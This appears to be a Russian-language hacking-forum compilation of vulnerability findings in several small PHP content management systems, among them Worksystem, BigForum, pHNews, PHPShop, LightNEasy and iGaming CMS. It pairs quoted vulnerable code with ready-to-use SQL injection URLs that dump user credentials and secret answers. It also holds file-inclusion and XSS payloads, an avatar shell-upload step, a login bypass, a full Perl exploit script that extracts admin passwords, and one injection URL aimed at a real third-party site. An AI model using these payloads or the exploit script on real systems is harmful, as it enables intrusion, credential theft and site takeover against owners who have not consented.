http://localhost/worksystem_4_0_39/module/catalogue/view_catalogue.php?select_catalogue=1+and+1=2+unio n+select+1,2,3,4,5,6,version%28%29,user(),9,10+--+&work_url=04eaaac39da09ffd351cf366b0bd70aa#

SQL
http://localhost/worksystem_4_0_39/module/catalogue/view_catalogue.php?select_catalogue=1+and+1=2++uni on+select+1,2,3,4,5,6,user(),8,9+--+&work_url=04eaaac39da09ffd351cf366b0bd70aa#

SQL
http://localhost/worksystem_4_0_39/module/catalogue/view_catalogue.php?select_catalogue=1+and+1=2++uni on+select+1,version(),3,database(),5,6,7,8,9,10,11 ,12,13,14,15,16,17,18,19,20,21,22,23+--+&work_url=04eaaac39da09ffd351cf366b0bd70aa#

-----------------------

module/booking/view_room.php
$select_catalogue = ( isset($_REQUEST['select_catalogue']) and intval($_REQUEST['select_catalogue']) >= 1 ) ? $_REQUEST['select_catalogue'] : "";

...

$query_select = "SELECT ID,TITLE,STATE,LINK,DESCRIPTION,CREATOR,FILE_NAME, RESUME,
UNIX_TIMESTAMP(DATE_CREATION) as DATE_CREATION, ID_THEMA, HITS,
PRICE,DISCOUNT,ID_CURRENCY,STOCK,STOCK_CURRENT,PER IOD_DELIVERY,
COLORS1,COLORS2,COLORS3,COLORS4,COLORS5,COLORS6,RE FERENCE_FREE
FROM ".$g_db_prefix."CATALOGUE where ID=$select_catalogue";
SQL
http://localhost/worksystem_4_0_39/module/booking/view_room.php?amp;work_url=0168e286bf&select_catalogue=1+union+select+1,2,3,4,5,6,7,8,9, 10,11,12,13,14,15,16,17,18,19,20,21,22,23,version( )+limit+1,1

-----------------------

module\forum\detailforum.php
include($g_include_forum."include_display_detailforum.php");


include_config.php
global_register('GET','POST');

function global_register() {
$num_args = func_num_args();
if ($num_args > 0) {
for ($i = 0; $i < $num_args; $i++) {
$method = strtoupper(func_get_arg($i));
if (($method != 'SESSION') && ($method != 'GET') && ($method != 'POST') && ($method != 'SERVER') && ($method != 'COOKIE') && ($method != 'ENV')) {
die("The \"$method\" is invalid argument, The argument of global_register must be the following: GET, POST, SESSION, SERVER, COOKIE, or ENV"); }
$varname = "_{$method}";
global ${$varname};
foreach (${$varname} as $key => $val) {
global ${$key};
${$key} = $val;
}
}
}else{
die('You must specify at least one argument');
}
}
module\forum\include\include_display_detailforum.p hp
$query_select = "SELECT ID,ID_INIT,TITLE,STATE,DESCRIPTION,CREATOR,UNIX_TI MESTAMP(DATE_CREATION) as DATE_CREATION,LINK
FROM ".$g_db_prefix."FORUM_INIT where ID=$select_forum and STATE=$state_display $profile_forum order by ORDER_DISPLAY asc, DATE_CREATION asc";

SQL
http://localhost/worksystem_4_0_39/module/forum/detailforum.php?select_forum=3+union+select+1,2,us er(),4,version(),6,7,8+--+&work_url=2fa5af6c22#

------------------------

module\news\view_news.php
$select_news = ( isset($_REQUEST['select_news']) and intval($_REQUEST['select_news']) >= 1 ) ? $_REQUEST['select_news'] : "";
...
$query_select = "SELECT a.ID,a.TITLE,a.STATE,a.LINK,a.DESCRIPTION,b.CREATO R,a.FILE_NAME,
UNIX_TIMESTAMP(a.DATE_CREATION) as DATE_CREATION,a.WHERE_IMAGE,a.SIZE_IMAGE,a.HITS,a. WRAPPER
FROM ".$g_db_prefix."NEWS a, ".$g_db_prefix."NEWS_SUPPLIER b where ID=$select_news and a.ID=b.NEWS_ID ";

SQL
http://localhost/worksystem_4_0_39/module/news/view_news.php?select_news=12+union+select+1,user() ,3,database(),version(),6,7,8,9,10,11,12+--+

------------------------------

Заходим админом

Кроме стандартного захода login : password, предусмотрен login : Secret answer, причем Secret answer хранится в таблице user
открытым текстом.

Узнаем префикс таблиц в базе.
http://localhost/worksystem_4_0_39/module/news/view_news.php?select_news=12+union+select+1,TABLE_ NAME,3,TABLE_SCHEMA,5,6,7,8,9,10,11,12+from+inform ation_schema.tables+--+
http://www.artpeinture.fr/work/module/news/view_news.php?select_news=12+union+select+1,TABLE_ NAME,3,TABLE_SCHEMA,5,6,7,8,9,10,11,12+from+inform ation_schema.tables+--+&work_url=8cd560377a

Читаем username и Secret answer
http://localhost/worksystem_4_0_39/module/news/view_news.php?select_news=12+union+select+1,name,3 ,ANSWER,5,6,7,8,9,10,11,12+from+work_user+--+

Запасной вход
http://localhost/worksystem_4_0_39/module/user/forget_password.php?f_username=admin&amp;work_url=8cd5 60377a
или
http://localhost/worksystem_4_0_39/module/user/forget_password.php?f_username=blabla'+or+GROUP_ID =7+--+&amp;work_url=8cd560377a

вводим секретный ответ и мы админы.

BigForum
Version: 4.5
http://sourceforge.net/projects/npage-bigforum/

SQL Injection:

/misc.php?aktion=adser&id=-1'+union+select+1,2,user(),4,5+--+
(Need mq = off)
Будет редирект на значение 3 поля.

/profil.php?id=-1'+union+select+1,concat_ws(0x3a,id,username,pw),3 ,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,2 2,23,24,25,26,27,28,29+from+users--+

/search.php
В Author / Erstellen
1u%' union select 1,2,3,4,5,6,7,8,9,10,11,12 --

/?do=show_one&id=-1'+union+select+1,concat_ws(0x3a,user(),database() ,version()),3,4+--+

Залитие шелла:

/main.php?do=ava&aktion=send
Выбираем как аватару шелл, и заливаем, /images/avatar/ .


BigForum 4.5 SQL INJ EXPLOIT.


#!/usr/bin/perl
use LWP::Simple;
print "\n";
print "################################################## ############\n";
print "# BigForum Version: 4.5 SQL INJECTION #\n";
print "# Author: Ctacok (Russian) #\n";
print "# Blog : www.Ctacok.ru #\n";
print "# Special for Antichat (forum.antichat.ru) and xakep.ru #\n";
print "# Require : Magic_quotes = Off #\n";
print "################################################## ############\n";
if (@ARGV < 2)
{
print "\n Usage: exploit.pl [host] [path] ";
print "\n EX : exploit.pl www.localhost.com /path/ \n\n";
exit;
}
$host=$ARGV[0];
$path=$ARGV[1];
$vuln = "-1'+union+select+1,concat(0x3a3a3a,id,0x3a,username ,0x3a,pw,0x3a3a3a),3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29+from+us ers";
$doc = get($host.$path."profil.php?id=".$vuln."+--+");
if ($doc =~ /:::(.+):(.+):(.+):::/){
print "\n[+] Admin id: : $1";
print "\n[+] Admin username: $2";
print "\n[+] Admin password: $3";
}




Dork: by Bigforum-Team (Version: 4.5 )

pHNews
product : pHNews-alpha1-normal

SQL injection
modules/comments.php - code
if ($ii >= $messagespp) {
// Find out how many pages
$pages = $ii / $messagespp;
$pages = ceil($pages);
$pages++;
$page++;
$pagesm = $pages - 1;
$comm_output .= pages($pagesm,"?mod=comments&id=".$_GET['id']."&page=");
}
unset($tmp_ended);
$sql = "SELECT lastread FROM Users WHERE UName = '$user_uname'";
$result = mysql_query($sql) or die('Query failed: ' . mysql_error());
$row = mysql_fetch_array($result, MYSQL_ASSOC);
$exploaded = $pHNews->explodeAssoc("&", $row['lastread']);
$exploaded[$_GET['id']] = time();
$sql = "UPDATE Users SET lastread='".$pHNews->implodeAssoc("&", $exploaded)."' WHERE UName = '$user_uname';";
mysql_query($sql);
$mod_output .= mysql_error();

result
mq=off
SQL Injection
http://localhost/upload/indexfix.php?mod=comments&id=1'+and+0+union+all+select+1,version(),3,4,5,6,7 ,8--+
Blind SQL Injection
http://localhost/upload/indexfix.php?mod=comments&user_uname=[blind sql]

modules/view_profile.php

//$sql = "SELECT * FROM `Users` WHERE `UName`='{$_GET['user']}'";
//$result = mysql_query($sql) or die('Query failed: ' . mysql_error());
//$row = mysql_fetch_array($result);
$row = $pHNews->get_user_info("", $_GET['user']);

result :
http://localhost/upload/indexfix.php?mod=view_profile&user='+and+0+union+all+select+1,2,3,4,5,6,7,8,9,10 ,11,12,13,14--+



Local File Inclusion
module/comments.php - code
include "./$templates_dir/$template/comments.php";
mq=off
result :
http://localhost/upload/modules/comments.php?templates_dir=../../upload/[file]%00
http://localhost/upload/modules/comments.php?template=../../upload/[file]%00
(с) milw0rm



SQL injection + Local File Inclusion
mq=off
rg=on
http://localhost/upload/indexfix.php?mod=view_profile'+and+0+union+all+sel ect+[LFI],2--+
http://localhost/upload/indexfix.php?mod=login'+and+0+union+all+select+[LFI],2--+
http://localhost/upload/indexfix.php?mod=usercp'+and+0+union+all+select+[LFI],2--+
http://localhost/upload/indexfix.php?mod=admin'+and+0+union+all+select+[LFI],2--+
http://localhost/upload/indexfix.php?mod=register'+and+0+union+all+select+[LFI],2--+
http://localhost/upload/indexfix.php?mod=news'+and+0+union+all+select+[LFI],2--+
http://localhost/upload/indexfix.php?mod=about'+and+0+union+all+select+[LFI],2--+
http://localhost/upload/indexfix.php?mod=terms'+and+0+union+all+select+[LFI],2--+

faNAME
product : en.faname

SQL injection
1. mq = off
page.php - уязвимость в коде файла /class/page.php к которому обращается файл
Code :
$id = $_GET['id'];
$kind = "id";
$result = mysql_query("SELECT * FROM blog WHERE $kind LIKE '$id' order by id DESC LIMIT 1");
while($r=mysql_fetch_array($result))
result :
http://localhost/en.faname/page.php?id=2'+and+0+union+all+select+1,version(), 3,4--+

Blind sql
2. admin panel
/admin/del.page.php
if($_GET["cmd"]=="delete")
{
$id = $_GET['id'];

$sql = "DELETE FROM blog WHERE id=$id";
$result = mysql_query($sql);
result :
http://localhost/en.faname/admin/del.page.php?cmd=delete&id={blind sql}

Passive XSS
mq = off
http://localhost/en.faname/index.php'%22/%3E%3Cscript%3Ealert(%22xss%22);%3C/script%3E

Драконий Движок
product : Драконий Движок 0.1

RFI - LFI
mq=off (Доступ в админ панель не нужна)
admin/system/include.php - Code :
include("$skindir/header.php");
....
include("$skindir/footer.php");
result :
http://localhost/admin/system/include.php?skindir=../../[FILE]%00
http://localhost/admin/system/include.php?skindir=http://localhost/1.txt?



SQL Injection
standart prefix : dre_
mq = off
index.php - обращение к файлу admin/system/engine.php : CODE
if ($p != "") $build .= " AND aid = '$p'";
if ($cat || $user) {
if (!$p) {
if ($cat) {$build .= " AND category = '$cat'";}
if ($user) {$build .= " AND username = '$user'";}

result :

http://localhost/index.php?cat=1'+and+0+union+all+select+1,2,concat _ws(0x3a,uid,username,password),4,5,6,7,8,9,10,11+ from+dre_users--+
http://localhost/index.php?user=1'+and+0+union+all+select+1,2,conca t_ws(0x3a,uid,username,password),4,5,6,7,8,9,10,11 +from+dre_users--+
http://localhost/index.php?p=2'+and+0+union+all+select+1,2,concat_w s(0x3a,uid,username,password),4,5,6,7,8,9,10,11+fr om+dre_users--+

Admin panel
mq=off
admin/profile.php : Code
$result = mysql_query("SELECT * FROM ".$prefix."profile WHERE username = '$username'");
result :
http://localhost/admin/profile.php?action=view&username=admin'+and+0+union+all+select+concat_ws(0 x3a,uid,username,password),2,3,4,5,6,7,8,9,10,11,1 2,13,14,15,16+from+dre_users--+

admin/categories.php - Code :
$result = mysql_query("SELECT * FROM ".$prefix."categories WHERE cid='$cid'");
result :
http://localhost/admin/categories.php?action=edit&cid=1'+and+0+union+all+select+1,concat_ws(0x3a,uid ,username,password)+from+dre_users--+

Ну и в конце комментирование - в текст комментария добавляем (для MySQL 5.0. ...)
'/**/and/**/1=(SELECT/**/*/**/FROM(SELECT/**/*/**/FROM(SELECT/**/NAME_CONST((version()),14)d)/**/as/**/t/**/JOIN/**/(SELECT/**/NAME_CONST((version()),14)e)b)a)/**/and/**/'1'='1


Passive XSS
http://localhost/index.php/%22%3E%3Cscript%3Ealert();%3C/script%3E

jurpopage
product : jurpopage-0.0.6
admin panel : /jurpopageadmin
SQL injection
mq=off
index.php
$query = "SELECT category_id AS category FROM category WHERE page_id='$page_id' ORDER BY category_id ASC LIMIT 0,1";
$result = fn_query($conn_id,$query);
while($rows = fn_fetch_array($result)) extract($rows,EXTR_OVERWRITE);
}
$active_category_id = $category;

$query = "SELECT category_title AS active_category_title FROM category WHERE page_id='$page_id' AND category_id = '$active_category_id'";
$result = fn_query($conn_id,$query);
while($rows = fn_fetch_array($result)) extract($rows,EXTR_OVERWRITE);

if(isset($HTTP_GET_VARS["id"])) $q_note_detail ="page_id = '$page_id' AND note_id = '$id'";
else $q_note_detail ="page_id = '$page_id' AND category_id = '$active_category_id' ORDER BY note_id DESC LIMIT 0,1";
...
$q_page ="WHERE page_id = '$page_id' AND category_id = '$active_category_id' ";
result :
http://localhost/index.php?page_id=[sql]
http://localhost/index.php?page_id=1&category=[sql]
http://localhost/index.php?page_id=1&category=100&id=49'+union+all+select+1,2,concat_ws(0x3a,user_na me,user_password),4+from+master_user+limit+1,1--+

jurpopageadmin/note.php
mq=off
доступ в админ панель
$query = "SELECT category_title FROM category WHERE page_id = '".$page_id."' AND category_id = '$category_id'";
http://localhost/jurpopageadmin/note.php?page_id=[sql]&category=[sql]


Passive XSS
mq=off
http://localhost/index.php'%22/%3E%3Cscript%3Ealert(%22xss%22);%3C/script%3E

PHPShop CMS Free v.3.1
http://www.phpshopcms.ru/

Active XSS


// Запись отзыва в базу
function WriteGbook()
{
global $LoadItems,$SysValue,$REMOTE_ADDR,$SERVER_NAME;


// Подключаем библиотеку отправки почты
PHPShopObj::loadClass("mail");

if(isset($_POST['send_gb']))
{
if(!preg_match("/@/",$_POST['mail_new']))//проверка почты
{
$_POST['mail_new']="";
}
if(@$_POST['name_new']!="" and @$_POST['otsiv_new']!="" and @$_POST['tema_new']!="")
{
$name_new=PHPShopSecurity::TotalClean($_POST['name_new'],2);
$otsiv_new=PHPShopSecurity::TotalClean($_POST['otsiv_new'],2);
$tema_new=PHPShopSecurity::TotalClean($_POST['tema_new'],2);
$mail_new=addslashes($_POST['mail_new']);

$date = date("d.m.y");
$ip=$REMOTE_ADDR;
$sql="INSERT INTO ".$SysValue['base']['table_name7']."
VALUES ('','$date','$name_new','$mail_new','$tema_new','$ otsiv_new','','0')";
mysql_query($sql)or @die($sql."Невозможно добавить к базе");

$zag=$LoadItems['System']['name']." - Уведомление о добалении отзыва / ".date("d-m-y");
$message="
Доброго времени!
---------------

С сайта ".$LoadItems['System']['name']." пришло уведомление о добалении отзыва
в гостевую книгу.

Данные о пользователе:
----------------------

Имя: ".@$name_new."
E-mail: ".@$mail_new."
Тема сообщения: ".@$tema_new."
Сообщение: ".@$otsiv_new."
Дата: ".date("d-m-y H:s a")."
IP: ".$REMOTE_ADDR."

---------------

С уважением,
Компания ".$LoadItems['System']['company']."
http://".$SERVER_NAME;

$PHPShopMail = new PHPShopMail($LoadItems['System']['adminmail2'],$mail_new,$zag,$message);


}
}
}


Проверка email только на @
if(!preg_match("/@/",$_POST['mail_new'])){
}

http://localhost/phpshop/gbook_forma/
POST: mail_new
mail_new = "><script>alert(1)</script>@<"



Расшифровал index.php если кому интересно

<?
session_start();
error_reporting(0);
if (file_exists("./cnstats/index.php"))
include ("./cnstats/cnt.php");
function ParseTemplate($TemplateName)
{
global $SysValue, $_SESSION, $PHP_SELF, $_ENV;
$file = newGetFile($SysValue['dir']['templates'] . chr(47) . $_SESSION['skin'] .
chr(47) . $TemplateName);
$string = newParser($file);
$path_parts = pathinfo($PHP_SELF);
if (getenv("COMSPEC"))
$dirSlesh = "\\";
else
$dirSlesh = "/";
$root = $path_parts['dirname'] . "/";
if ($path_parts['dirname'] != $dirSlesh) {
$replaces = array("/images\//i" => $SysValue['dir']['templates'] . chr(47) . $_SESSION['skin'] .
"/images/", "/\/favicon.ico/i" => $root . "favicon.ico", "/java\//i" => $root .
"java/", "/css\//i" => $root . "css/", "/phpshop\//i" => $root . "phpshop/", "/\/links\//i" =>
$root . "links/", "/\/files\//i" => $root . "files/", "/\/opros\//i" => $root .
"opros/", "/\/page\//i" => $root . "page/", "/\/news\//i" => $root . "news/", "/\/gbook\//i" =>
$root . "gbook/", "/\/search\//i" => $root . "search/", "/\"\/\"/i" => $root, "/\/map\//i" =>
$root . "map/", "/\/rss\//i" => $root . "rss/", );
} else {
$replaces = array("/images\//i" => $SysValue['dir']['templates'] . chr(47) . $_SESSION['skin'] .
"/images/", "/java\//i" => "/java/", "/css\//i" => "/css/", "/phpshop\//i" =>
"/phpshop/", );
}
$string = preg_replace(array_keys($replaces), array_values($replaces), $string);
echo $string;
}
function ParseTemplateReturn($TemplateName)
{
global $SysValue, $LoadItems, $_SESSION;
$SysValue = $GLOBALS['SysValue'];
$file = newGetFile($SysValue['dir']['templates'] . chr(47) . $_SESSION['skin'] .
chr(47) . $TemplateName);
$dis = newParser($file);
return @$dis;
}
function ConstantS($string)
{
return @preg_replace_callback("/@([[:alnum:]]+)@/", "ConstantR", $string);
}
function allowedFunctions($str)
{
$allowFunctions = array('if', 'else', 'swicth', 'for', 'foreach', 'phpinfo',
'echo', 'print', 'print_r');
$allowFunctions = array_merge($allowFunctions, explode(',', $GLOBALS['SysValue']['function']['allowed']));
preg_match_all('/\s*([A-Za-z0-9_]+)\s*\(/isU', $str, $findedFunctions);
$remElements = array_diff($findedFunctions[1], $allowFunctions);
if (count($remElements) > 0) {
echo ('<br><br><b>В шаблоне обнаружена запрещенная функция</b><br>');
echo ('Список найденных запрещенных функций:');
echo ('<pre>');
foreach ($remElements as $remElement) {
echo ($remElement . '()<br>');
}
echo ('</pre><br>');
echo ('Список разрешенных функций (добавить свою функцию можно в config.ini):');
echo ('<pre>');
foreach ($allowFunctions as $allowFunction) {
echo ($allowFunction . '()<br>');
}
echo ('<br>');
echo ('</pre><br>');
return false;
} else {
return true;
}
}
function evalstr($str)
{
ob_start();
if (eval(stripslashes($str[2])) !== null) {
echo ('<center style="color:red"><br><br><b>PHPShop Template Code: В шаблоне обнаружена ошибка выполнения php</b><br>');
echo ('Код содержащий ошибки:');
echo ('<pre>');
echo ($str[2]);
echo ('</pre></center>');
return ob_get_clean();
}
return ob_get_clean();
}
function newParser($string)
{
global $SysValue;
$newstring = @preg_replace_callback("/(@php)(.*)(php@)/sU", "evalstr", $string);
$newstring = @preg_replace("/@([[:alnum:]]+)@/e", '$SysValue["other"]["\1"]', $newstring);
return $newstring;
}
function ConstantR($array)
{
global $SysValue;
if (!empty($SysValue['other'][$array[1]]))
$string = $SysValue['other'][$array[1]];
else
$string = null;
return $string;
}
function newGetFile($path)
{
$file = @file_get_contents($path);
if (!$file)
return false;
return $file;
}
$time = explode(' ', microtime());
$start_time = $time[1] + $time[0];
include ("./phpshop/class/base.class.php");
$PHPShopBase = new PHPShopBase("./phpshop/inc/config.ini");
$RegTo['RegisteredTo'] = "PHPShop CMS Free";
$RegTo['CopyrightEnabled'] = "Yes";
$RegTo['DomenLocked'] = "No";
$RegTo['CopyrightColor'] = "6A7EA1";
$RegTo['SupportExpires'] = "0";
include ($SysValue['file']['error']);
if (empty($GLOBALS['p']))
$GLOBALS['p'] = 1;
if ($SysValue['my']['gzip'] == "true")
include ($SysValue['file']['gzip']);
include ($SysValue['class']['obj']);
include ($SysValue['class']['array']);
include ($SysValue['class']['category']);
include ($SysValue['class']['system']);
include ($SysValue['class']['page']);
include ($SysValue['class']['photo']);
include ($SysValue['class']['nav']);
include ($SysValue['class']['security']);
$PHPShopSystem = new PHPShopSystem();
$LoadItems['System'] = $PHPShopSystem->getArray();
$PHPShopNav = new PHPShopNav();
include ($SysValue['file']['engine']);
include ($SysValue['file']['catalog']);
include ($SysValue['file']['news']);
include ($SysValue['file']['subnews']);
include ($SysValue['file']['baner']);
include ($SysValue['file']['cache']);
include ($SysValue['file']['opros']);
if ($LoadItems['System']['spec_num'] == 1) {
if (isset($_REQUEST['skin'])) {
if (file_exists("phpshop/templates/" . $_REQUEST['skin'] . "/index.html")) {
$skin = $_REQUEST['skin'];
session_register('skin');
}
} elseif (empty($_SESSION['skin'])) {
$skin = $LoadItems['System']['skin'];
session_register('skin');
}
$SysValue['other']['skinSelect'] = Skin_select($_SESSION['skin']);
} else {
$skin = $LoadItems['System']['skin'];
session_register('skin');
}
$LoadItems = CacheReturn();
foreach (@$SysValue['autoload'] as $val)
if (file_exists($val))
include_once ($val);
function GetFileInstall()
{
global $SysValue;
$filename = "./install/";
if (is_dir($filename))
exit(PHPSHOP_error(105, $SysValue['my']['error_tracer']));
}
if (!getenv("COMSPEC"))
$GetFileInstall = GetFileInstall();
if ((isset($_GET['nav'])) && ($_GET['nav'] == "page")) {
$Check_page_skin = Check_page_skin($_GET['name']);
if ($Check_page_skin != "") {
$skin = $Check_page_skin;
session_register('skin');
} elseif ($LoadItems['System']['spec_num'] != 1) {
$skin = $LoadItems['System']['skin'];
session_register('skin');
}
}
if (isset($_POST['skin']))
header("Location: " . htmlspecialchars($REQUEST_URI));
include ($SysValue['file']['meta']);
$SysValue['other']['ProductName'] = $SysValue['license']['product_name'];
include ($SysValue['file']['autoload']);
$time = explode(' ', microtime());
$seconds = ($time[1] + $time[0] - $start_time);
$seconds = substr($seconds, 0, 6);
echo "<!-- StNF " . $SysValue['sql']['num'] . " ~ $seconds -->";
if ($SysValue['my']['gzip'] == "true")
GzDocOut($SysValue['my']['gzip_level'], $SysValue['my']['gzip_debug']); ?>

product : jurpopage-0.0.6 Дополнение постов [x60]unu...
SQL inj
html.php
mg=off ...
if(empty($id)) $id=1;

$web = new speed_template($template_path);
$web->register($template_name);

$query = "
SELECT *
FROM webpg
WHERE webpg_id='$id'
";
...Result:
http://localhost/jurp/html.php?id=[sql]
http://localhost/jurp/html.php?id=3'+union+select+1,2,3--+

SQL inj
Файл login.php
POST + капча
mg=off
В скрипте 2 запроса.
Многострочный коментарий надо во второй запрос втулить чтоб обойти авторизацию, но так как там upper(), то не получаеться, вот. Но самое интересное что -- принимает.
В поле с USER ID такую строку
a') and(1,2)=(select * from(select+name_const(version(),1),name_const(ver sion(),1))a)--
и имеею иньекцию в первом запросе. Обязательны все 3 поля.

...$conn_id = connect();
//--- check apakah ada nama user tersebut
//master user
$query = "
SELECT
count(*) as user_exist
FROM
master_user
WHERE
upper(user_id) = upper('$send_user')
";
$result = fn_query($conn_id,$query);
$mRet =fn_fetch_row($result);
if ($mRet[0]>0) {
//proses
while($rows = fn_fetch_array($result)) extract($rows,EXTR_OVERWRITE);
$password = md5($password);
$query = "
SELECT
#user_id as temp_value, user_level as temp_level
user_id as temp_value, user_level as temp_level,
master_user_id as temp_rowid
FROM
master_user
WHERE
upper(user_id) = upper('$send_user') and
user_password = '$password'
";...
вывод ошибок от СУБД есть, файл fungsi.php
...function fn_query($conn, $input)
{
//$result =pg_query($input,$conn);
$result =@mysql_query($input,$conn);
if (!$result)
{
die ("Error eksekusi:<br>".mysql_error());
return false;
}
return $result;...

Дополнение постов [x60]unu...
iGaming CMS
Product : iGaming CMS
version : 1.5
site : forums.igamingcms.com

SQL inj
Файл screenshots.php
mg=off
...if (isset($_REQUEST[id])) {

$result = $db->Execute("SELECT * FROM `sp_screenshots` WHERE `id` = '$_REQUEST[id]' LIMIT 1");
echo $start_table . '<b>',stripslashes($result->fields['title']),'</b>' . $end_table . '<br />';
echo '<center><img src="',$result->fields['screen'],'" border="0" alt="',stripslashes($result->fields['title']),'"></center>';

}...
Result:
http://localhost/gami/screenshots.php?id=1[sql]
http://localhost/gami/screenshots.php?id=-1'+union+select+1,version(),3,4,5--+

SQL inj
reviews.php
mg=off
... if (isset($_REQUEST['browse'])) {
$sql = $db->Execute("SELECT id,title,section FROM `sp_reviews`
WHERE `title` LIKE '".$_REQUEST['browse']."%'
ORDER BY `title`");...Result:
http://localhost/gami/reviews.php?browse=Z[sql]
http://localhost/gami/reviews.php?browse=Z'+union+select+1,2,3/*

SQL ing
search.php
mg=off
... if ($_REQUEST['platform'] != 'all') {
$platform = "`section` = '" . $_REQUEST['platform'] . "' ";
} else {
$platform = "`section` LIKE '%' ";
}
if ($_REQUEST['exact'] == '1') {
$title = "`title` = '".$_REQUEST['keywords']."' ";
} else {
$title = "`title` LIKE '%".$_REQUEST['keywords']."%' ";
}
$result = $db->Execute("SELECT id,title,section,publisher,developer FROM `sp_games` WHERE $title AND $platform AND `published` = '1' ORDER BY `title`");
while ($row = $result->FetchNextObject()) {...
Result:
Посылаем пост или гет запрос.
$_REQUEST['keywords'][sql] или на другую переменную...
поле Keywords пишем - %' union select 1,version(),3,4,5/*

Blind sql
poll_vote.php
$result = $db->Execute("SELECT * FROM sp_polls_options WHERE id = '$_REQUEST[id]'");

$ip = $db->Execute("SELECT * FROM sp_polls_iplog WHERE pollid = '" . $result->fields['poll_id'] . "' AND ip = '" . $_SERVER['REMOTE_ADDR'] . "';") or die($db->ErrorMsg());
if ($ip->RecordCount() < 1)
{
$count2 = $result->fields['count'] + 1;
$db->Execute("UPDATE `sp_polls_options` SET `count` = $count2 WHERE `id` = '$_REQUEST[id]'");
$db->Execute("INSERT INTO sp_polls_iplog (pollid,ip) VALUES ('" . $result->fields['poll_id'] . "','" . $_SERVER['REMOTE_ADDR'] . "');");
}
если чесно даже ковырять впадляк !!! много дыр... :)

Jupiter 1.1.5
http://www.jupiterportal.org
passive xss
было скачано с http://www.cmsdownload.com/index.php?name=Downloads&get=99&mirror=132
...error_reporting (E_ALL);
$PHP_SELF = $_SERVER['PHP_SELF'];......<tr><td class="con1" valign="top"><a href="<?= $PHP_SELF ?>?a=logout"> &raquo; <?= $language['Bans desc4'] ?></a></td></tr>......if(!isset($is_loged_in))
{
?>
<tr class='bottom' height='1%'><td valign='top'><?= $language['Maintance title2'] ?></td></tr><tr><td class='con2'><?= messagedef($language['Header message']) ?></td></tr>
<tr><td class='con1' height='96%' valign='top'>
<form method='post' action='<?= $PHP_SELF ?>?n=modules/login'>......<table width='100%' cellspacing='1' border='0' cellpadding='2'>
<tr><td class='empty' width='35%' valign='top'><a href='<?= $PHP_SELF ?>?n=modules/login&a=1'> &raquo; <?= $language['Maintance desc6'] ?></a></td>
<td class='con1' width='5%'>&nbsp;</td>......if(file_exists("$n.php"))
{
if(strpos($n, "../") !== false) header("location: $PHP_SELF?i=error");
else include("$n.php");
}
elseif(!file_exists("$n.php")) header("location: $PHP_SELF?i=error");...Result:
http://localhost/jupiter/index.php[XSS]

passive xss
modules/block.php
...if(!isset($is_webmaster))
{ header("location: $PHP_SELF?i=2"); exit; }...Result:http://localhost/jupiter/modules/blocks.php[XSS]
http://localhost/jupiter/modules/blocks.php%3Cscript%3Ealert(123)%3C/script%3E
В скриптах есть еще много XSS=/

LightNEasy
site:http://www.lightneasy.org/index.php

magic_quotes_gps = off
Вход с полномочиями admin
Единственное, что я придумал:
login: "+union+select+1,2,'40bd001563085fc35165329ea1ff5c5 ecbdbbeef',5,5,6,7,8,9,10,11+--+
pass: 123
40bd001563085fc35165329ea1ff5c5ecbdbbeef - sha-1("123")

Уязвимый код(common.php):

$result=dbquery('SELECT * FROM '.$prefix.'users WHERE handle="'.$_POST['handle'].'"');
if($row = fetch_array($result)) {
if($row['password'] == sha1($_POST['password'])) {
//inserts password in cookie
setcookie('userpass', sha1(trim($_POST['password'])), time() + 60 * 60 * 24 * 30);
setcookie('userhandle', $_POST['handle'], time() + 60 * 60 * 24 * 30);
$_SESSION[$set['password']]="1";
$_SESSION['user']=$row['handle'];
$_SESSION['adminlevel']=$row['adminlevel'];
$message=$langmessage[95];
unset($_GET['do']);
header("Location: ".$set['homepath']);
} else
$message=$langmessage[96];
} else
$message=$langmessage[96];


Activexss

http://localhost/light/LightNEasy.php?page=news


commentmessage=<script>alert(document.cookie)</script>


Уязвимый код(common.php)

$_POST['commentmessage'] = str_replace($order, "<br />", $_POST['commentmessage']);
$query="INSERT INTO ".$prefix."comments (newsid, poster, postermail, time, text) VALUES (".$_POST['newsid'].",\" ".encode($_POST['commentname'])."\", \"".encode($_POST['commentemail'])."\", ".time().", \"".encode(stripslashes($_POST['commentmessage']))."\")";
dbquery($query);

Дополнение к https://forum.antichat.ru/showpost.php?p=1991535&postcount=343

---------------------------------------

SQL injection(требования: mq=off,rq=on)

№1

file: modules/users.php


case 1:

....

$user = $db->getLine("SELECT * FROM users",$d);
if(!$user) header("location: $PHP_SELF?i=error");

....


file: includes/functions_db.php


function getLine($query,$id=FALSE)
{
if($id===FALSE)
$this->query($query);
else
$this->query($query." WHERE `id`='$id'");
if(is_resource($this->sqlr))
{
$line=mysql_fetch_assoc($this->sqlr);
$this->freeResult();
return $line;
}
return FALSE;
}


result:

/index.php?n=modules/users&a=1&d=-1'+union+select+1,2,concat_ws(0x3a,username,passwo rd),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,2 1,22,23,24,25,26,27+from+users+where+id=1+--+

№2

file: modules/forum.php


case 1:

...

$forum_cat = $db->getLine("SELECT id, name FROM forum_cat",$d);
if(!$forum_cat) header("location: $PHP_SELF?i=error");

...


file: includes/functions_db.php


function getLine($query,$id=FALSE)
{
if($id===FALSE)
$this->query($query);
else
$this->query($query." WHERE `id`='$id'");
if(is_resource($this->sqlr))
{
$line=mysql_fetch_assoc($this->sqlr);
$this->freeResult();
return $line;
}
return FALSE;
}


result:

/index.php?n=modules/forum&a=1&d=-1'+union+select+1,concat_ws(0x3a,username,password )+from+users+where+id=1+--+

//инъекции с использованием бажной функции getLine
№3

/index.php?n=modules/forum&a=3&d=1&o=1&q=-1'+union+select+1,2,3,4,concat_ws(0x3a,username,pa ssword),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,2 1,22,23+from+users+where+id=1+--+

№4

/index.php?n=modules/forum&a=5&d=1&o=1&q=1&p=0&k=-1'+union+select+1,concat_ws(0x3a,username,password )+from+users+where+id=1+--+

№5

/index.php?n=modules/pm&a=3&d=-1'+union+select+1,2,3,4,5,concat_ws(0x3a,username, password),7,8,9,10,11,12,13,14,15,16,17,18,19,20+f rom+users+where+id=1+--+&s=r_date&t=DESC&p=1

...

Product: Acute Control Panel
Version: 1.1.1
Author: http://acutecp.rediscussed.com/

Автор выложил на опенсурсецмс.орг, наткнулся, и посмотрел :)

SQL-Inj

Need: mq = off

File: acute-cp/login.php


$username = strtolower($_POST['username']);
$password = strtolower($_POST['password']);

